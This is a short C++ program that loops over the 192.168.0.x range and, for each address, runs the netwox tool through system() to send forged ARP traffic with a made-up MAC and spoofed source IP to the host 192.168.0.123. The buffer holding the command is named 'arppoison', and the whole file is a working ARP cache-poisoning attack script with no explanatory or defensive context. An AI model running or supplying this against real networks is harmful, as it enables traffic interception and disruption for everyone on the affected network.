#include <iostream>
#include <cstdlib>

using namespace std;

int main()
{
    char add[50];
    char ethadd[50];
    char arppoison[1000];

    for(int i = 1; i < 255; ++i)
    {
        sprintf(add, "192.168.0.%d", i);
        sprintf(ethadd, "%x:%x:%x:%x:%x:%x",i,i,i,i,i,i);
        sprintf(arppoison, "netwox 72 --ips \"192.168.0.123\" --device \"Eth0\" --src-eth %s --src-ip %s", ethadd, add);
        system(arppoison);
    }
}
